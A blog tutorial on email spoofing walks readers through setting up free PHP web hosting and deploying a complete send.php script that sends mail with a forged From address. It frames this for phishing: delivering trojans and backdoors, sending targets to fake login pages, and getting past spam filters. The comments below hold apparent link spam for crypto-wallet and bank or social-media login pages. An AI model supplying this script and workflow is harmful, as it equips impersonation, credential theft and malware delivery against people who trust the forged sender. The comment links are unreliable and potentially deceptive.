top of page
Programming
Writer's pictureGourav Dhar

How hackers impersonate email-id’s : Email Spoofing and Phishing Attacks


Email Spoofing

Email Spoofing is a type of cyber-attack where the attacker sends fake emails which appear to have been sent by a legitimate/known person or entity. It is a common tactic for carrying out phishing attacks or spamming. The receiver of the email will see an email they trust and a name they are familiar with — mostly a friend or a colleague or an organisation they work with) and end up believing the email and taking action as mentioned.

In my previous blogs, I have mentioned how to create trojan and backdoors. When executed, the users sees normal files, but in the background, the evil code gets executed.


Delivering these files can be an application of email spoofing.


How to Spoof Emails

The initial step relies on information gathered and deciding which email you want to spoof. The emails should impersonate emails from a person or an organisation that the target can trust. It’s all social engineering!


If you are impersonating a friend, you can tell the target person to open an image. If you impersonate a support member from an organisation or admin of a website, you can tell the target to log in using a fake login page or tell the target to install an update.


Take a scenario

Suppose I want to impersonate the target person’s friend whose name is Aakashand I know that his email id is aakash@gmail.com . I will try to send a fake email to my target impersonating his email id.

It is really easy. Go to google and search for spoof emails online.


You will find a lot of websites providing this service. The problem with sending emails from these websites is that a lot of these emails will end up in the spam directory of the target person and not in the inbox of the person. The reason for this is because these websites are public and a lot of people use these websites for spamming, so mail server like google, yahoo, etc. mark emails received from these servers as spam.

To bypass this you can either use your own web-hosting plan or you can sign up for a free web-hosting plan and use that for sending fake emails.


Using a web hosting plan

The requirement for this method is that the web-hosting provider should support php files, so a static web-hosting won’t work. You can also use your own domain with the web-hosting provider but for this blog I will use a free web-hosting provider. I will be using https://www.000webhost.com/.

This is a paid service but I will be using their free plan for this blog. Go to the above link, scroll down and click on Free Sign Up under the Free Web Hosting .


After signing up, click on Create new site button on the top right.

A pop-up will appear where you would need to add your website name and password. Now remember both of these.

Next open https://files.000webhost.com/ in the same browser where you are logged into the webhost account. You may or may not need to enter the above credentials. If you are prompted, enter the above credentials and proceed. A page similar to the one shown below should be visible.


Open the folder named public_html by double clicking. Save the following script in a file named send.php and upload it to the folder named public_html

<?php
if (isset($_POST["send"])) {
$to = $_POST["to"];
 $subject = $_POST["subject"];
 $message = $_POST["message"];
 $from = $_POST["from"];
 $name = $_POST["name"];
if (!(filter_var($to, FILTER_VALIDATE_EMAIL) && filter_var($from, FILTER_VALIDATE_EMAIL))) {
  echo "Email address inputs invalid";
   die();
 }
$header = "From: " .  $name . " <" . $from . ">\r\nMIME-Version: 1.0\r\nContent-type: text/html\r\n";
$retval = mail ($to, $subject, $message, $header);
if ($retval) {
  echo "Email sent.";
 } else {
  echo "Email did not send. Error: " . $retval;
 }
} else {
 echo 
 '<html>
  <head>
   <style> 
    input[type=submit] {
      background-color: #4CAF50;
      border: none;
      color: white;
      padding: 14px 32px;
      text-decoration: none;
      margin: 4px 2px;
      cursor: pointer;
      font-size: 16px;
    }
   </style>
  </head>
  <body>
<h2>Spoof Email</h2>
<form action="/send.php" method="post" id="emailform">
     <label for="to">To:</label><br>
     <input type="text" id="to" name="to"><br><br>
     <label for="from">From:</label><br>
     <input type="text" id="from" name="from"><br><br>
     <label for="name">Name (optional):</label><br>
     <input type="text" id="name" name="name"><br><br>
     <label for="subject">Subject:</label><br>
     <input type="text" id="subject" name="subject"><br><br>
     <label for="message">Message [HTML is supported]:</label><br>
     <textarea rows="6" cols="50" name="message" form="emailform"></textarea><br><br>
     <input type="hidden" id="send" name="send" value="true">
     <input type="submit" value="Submit">
   </form>
<p>An e-mail will be sent to the desired target with a spoofed From header when you click Submit.</p>
</body>
 </html>' ;
}
?>

Great we are done !!! Now it’s time for some action. Goto the homepage of 000webhost . Your site will appear in a card. Click on the url.


I need to append send.php to the end of the url and run it.  So for me the url will be https://test-xyz-infinee.000webhostapp.com/send.php


A form similar to the one shown below will appear.


Since I was impersonating Aakash whose email id is aakash@gmail.com , I will fill in the details accordingly.

And finally click on submit and poof! Email Sent

On checking my email (target_email), I actually received an email from the email address aakash@gmail.com . I also got a notification on my iPhone and it looks pretty convincing and authentic!


Attaching screenshots of how the emails look on the browser when opened.

The name appears correctly. Even the email id appears correctly.

The only way to distinguish that it is not original and is a phishing email is the text written after via , that too only if the email is viewed in a web browser.


This blog was originally published in the personal blog website of Gourav : https://gourav-dhar.com
7 comments

Related Posts

See All

7 Comments


Trezor .io/start is the official guide for setting up Trezor hardware wallets, offering top-notch security for managing cryptocurrencies offline. The Binance Wallet Extension is a browser-based wallet for managing Binance Chain, Binance Smart Chain, and Ethereum assets, allowing secure transactions and access to decentralized apps (dApps). Trezor.io/start |Binance Wallet Extension

Edited
Like

Capital One Login is a secure online portal that allows Capital One customers to access their bank accounts, credit cards, and financial services. Users can manage transactions, pay bills, view statements, and monitor account activity through the website or mobile app. Capital One Login | Capital One Login

Like

Discover the step-by-step guide to logging into Facebook without any hassle. Quick, easy, and secure methods for accessing your Facebook account. Click to learn more.Get solutions for common Facebook login problems. Read our comprehensive guide to troubleshoot and fix your login issues quickly. Click to solve your problems now. Facebook Entrar| Facebook Entrar

Like

Get direct access to your Gmail login with our quick guide. Skip the hassle and enter your Gmail account instantly. Click here to learn more! Protect your Gmail account with these top security tips. Learn how to secure your emails and personal information effectively. Click to read more! Gmail Entrar | Gmail Entrar

Like

Ben Roy
Ben Roy
Sep 26

The Phantom Wallet Extension has quickly become a favorite among cryptocurrency users. With its easy-to-use interface and robust features, it offers everything needed to manage your digital assets efficiently. Whether you're a seasoned crypto trader or a beginner, the Phantom Wallet makes managing your tokens and NFTs a breeze.Phantom stands out for its security and seamless integration with Solana, one of the fastest-growing blockchain ecosystems. Users trust Phantom Wallet because it delivers high-end encryption, ensuring your private keys remain secure. Moreover, the wallet is a browser extension, allowing instant access to your digital assets with a few clicks.

Phantom Wallet Extension | Phantom Wallet Extension

Like
download (7)_edited.png
Subscribe to my Youtube Channel @codewithgd

Related Articles

Videos you might like

Let's Get
Social

  • alt.text.label.Twitter
  • alt.text.label.LinkedIn
  • 25231
Subscribe to our NewsLetter

Join our mailing list to get a notification whenever a new blog is published. Don't worry we will not spam you.

bottom of page